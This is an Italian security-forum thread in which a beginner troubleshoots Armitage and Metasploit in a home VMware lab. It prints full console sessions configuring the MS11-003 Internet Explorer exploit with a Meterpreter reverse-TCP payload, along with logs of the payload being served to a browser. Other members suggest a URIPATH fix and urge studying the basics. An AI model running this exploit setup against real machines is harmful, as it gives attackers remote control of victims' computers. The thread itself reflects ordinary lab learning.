armitage

Started by dravok, April 18, 2011, 12:20:44 AM

Previous topic - Next topic

dravok

installazione perfetta, settaggio perfetto (mi baso al video dimostrativo)

ma quando inizio la connessione non mi appare il pc rosso elettrizzato.

osservando armitage noto che il serve non si connette

ecco cosa vedo

use exploit/windows/browser/ms11_003_ie_css_import
meterpreter > set SSLVersion SSL3
meterpreter > set DisablePayloadHandler 1
SSLVersion => SSL3
DisablePayloadHandler => 1
msf exploit(ms11_003_ie_css_import) > set SRVPORT 8080
SRVPORT => 8080
msf exploit(ms11_003_ie_css_import) > set SSL 0
SSL => 0
msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > set TARGET 0
TARGET => 0
msf exploit(ms11_003_ie_css_import) > set SRVHOST 192.168.126.153
SRVHOST => 192.168.126.153
msf exploit(ms11_003_ie_css_import) > set URIPATH /
URIPATH => /
msf exploit(ms11_003_ie_css_import) > exploit -j
SSLVersion => SSL3
  • Exploit running as background job.
  • Using URL: http://192.168.126.153:8080/
    [-] Exploit exception: The supplied resource '/' is already added.
  • Server stopped.



    la scrita server stopped mi sa di errore, come faccio ad attivare?

SYSTEM_OVERIDE

Il problema è qui

[-] Exploit exception: The supplied resource '/' is already added.

Prova a settare come uripath il percorso /home, oppure chiudi tutte le connessioni che hai già fatto con Armitage e rilancia l'exploit .

dravok

#2
ho messo home e adesso il serve è in start, ma quando avvio con l altro pc l indirizzo, armitrage registra i nuovi dati ma non mi appare il pc rosso elettrizzato.. sbaglio qualcosa?

use exploit/windows/browser/ms11_003_ie_css_import
meterpreter > set SSLVersion SSL3
SSLVersion => SSL3
msf exploit(ms11_003_ie_css_import) > set DisablePayloadHandler 1
DisablePayloadHandler => 1
msf exploit(ms11_003_ie_css_import) > set SRVPORT 8080
SRVPORT => 8080
msf exploit(ms11_003_ie_css_import) > set SSL 0
SSL => 0
msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > set TARGET 0
msf exploit(ms11_003_ie_css_import) > set SRVHOST 192.168.126.155
TARGET => 0
SRVHOST => 192.168.126.155
msf exploit(ms11_003_ie_css_import) > set URIPATH /home
URIPATH => /home
msf exploit(ms11_003_ie_css_import) > exploit -j
PAYLOAD => windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
TARGET => 0
  • Exploit running as background job.
  • Using URL: http://192.168.126.155:8080/home
  • Server started.
  • 192.168.126.1:49374 Received request for "/home/OzCK.html"
  • 192.168.126.1:49374 Sending windows/browser/ms11_003_ie_css_import HTML
  • 192.168.126.1:49374 Received request for "/home/generic-1303132060.dll"
  • 192.168.126.1:49374 Sending windows/browser/ms11_003_ie_css_import .NET DLL
  • 192.168.126.1:49376 Received request for "/home/\356\200\240\341\201\232\356\200\240\341\201\232\356\200\240\341\201\232\356\200\240\341\201\232"
  • 192.168.126.1:49376 Sending windows/browser/ms11_003_ie_css_import CSS


    premetto che backbox è installato su vmware workstat.. come anche i gli altri pc che testo,
    inoltre ho testato anche il pc non virtuale, ma sempre la stessa storia, non mi appare il pc elettrizzato che ho visto nel video.

    devo impostare altro o cliccare altrove..

    grazie!
    ;D

SYSTEM_OVERIDE

Il PC elettrizzato non ti appare, ma riesci ad ottenerne il controllo ?

dravok

non so,
pensavo di cliccare sul pc elettrizato col tasto destro e usare il menu che mi offriva,
ma senza pc elettrizato come provo?
dal menu in alto?

ok ci provo adesso e ti dico

SYSTEM_OVERIDE

Prova, devi riuscire a capire se l'exploit worka oppure fallisce .

dravok

scusa il ritardo, problemi di connessione

allora ho riprovato a fare i diversi passaggi come dal video ma anche aprendo nel pc vittima internet Explorer 8 con l indirizzo del mio pc e la porta, li internet explorer non si blocca come nel filmato e a me su armitage non appare la scrita
meterpreter sesion 1 opened

rimangono le precedenti, anche se aggiorno la pagina di internet explorer, quindi presumo che l attacco non avvenga

dravok

ieri ho tentato fino a notte(per me fonda)(03,20) alcuni risvolti ma nessun attacco di successo.

Girando su youtub ho trovato altri video e testando qua e la, ho fatto una scansione ip trovando i miei due pc(uno virtuale xp) (e il principale su hardisk, 7)
Ripeto, io provo bkbx installato su virtuare vmware,
Allora,  dopo tante prove, non so se dipenda dal tempo che gli ho offerto, o se dipenda dal fatto che ho disattivato il fireware,
Fatto sta che mi sono apparsi i due pc xp e 7 ma non elettrizati.
Per attaccarli ho provato diversi metodi tra cui hail mary che mi dava, attacco fallito o metodo non supportato.
Sul pc virtuale xp se cliccavo su service mi diceva tcp open meterpreter BACKDOR
Ma non sapevo come utilizzare questa info.
Stasera ci riprovo, ma qualcuno tra voi puo darmi  qualche consiglio o opinione a riguardo?
Secondo le mie prove di ieri sera non é possibile accedere ai miei pc solo attraverso indirizzo, cioe non tengo conto dell attacco dato dal video postato qui nel forum, perche  non mi va avanti.

raffaele

L'attacco mostrato nella video guida è tanto semplice quanto articolato. Stai cercando di riprodurre un hack senza conoscerne le basi. Ovvio che nel video sembra tutto più semplice...
Ti consiglio, prima di usare Armitage, di studiare meglio come funziona Metasploit, documentarti sull'exploit e solo dopo che ti sono chiare almeno queste cose passare ad Armitage.
Lo scopo di BackBox Linux è avvicinare le persone in maniera costruttiva al mondo della sicurezza informatica ma non per questo dovete approfittare della semplicità della distro e banalizzare il tutto.
raffaele@backbox:~$ Get root or die tryin'

SYSTEM_OVERIDE

Quote from: raffaele on April 21, 2011, 10:28:57 AM
L'attacco mostrato nella video guida è tanto semplice quanto articolato. Stai cercando di riprodurre un hack senza conoscerne le basi. Ovvio che nel video sembra tutto più semplice...
Ti consiglio, prima di usare Armitage, di studiare meglio come funziona Metasploit, documentarti sull'exploit e solo dopo che ti sono chiare almeno queste cose passare ad Armitage.
Lo scopo di BackBox Linux è avvicinare le persone in maniera costruttiva al mondo della sicurezza informatica ma non per questo dovete approfittare della semplicità della distro e banalizzare il tutto.

Quoto quello che dice raffaele .
Dietro a quei semplici comandi ci sono complesse operazioni, è bene sapere cosa succede e come funziona un determinato exploit .

dravok

mi scuso per aver involontariamente banalizzato la distro,

come gia detto in altri post, sto entrando in questo mondo partendo da bb data la sua semplicita e accuratezza, come dice la la scritta sotto il mio nome qui in forum, sono un Newbie. quindi cerco, se pur con difficolta, notizie sul web per approfondire i miei studi.
Dato che la distro è di recente creazione, pensavo di poter dare una mano testanto i diversi tool e osservando i diversi comportamenti.
Ma ora capisco di essere ancora troppo indietro, troppo neofita per dare un contributo.
Vi ringrazio ugualmente per il supporto datomi.
;)

raffaele

dravok, non preoccuparti... solo un consiglio. spesso è più utile sbatterci la testa che chiedere a qualcuno la soluzione. per il resto sei il benvenuto ;)
raffaele@backbox:~$ Get root or die tryin'

dravok

 ;D si hai ragione.

Difatti ho cercato e su gogle ho trovato il sito produttore con manuale e faq

dopo averlo tradotto me lo sto studiando per bene.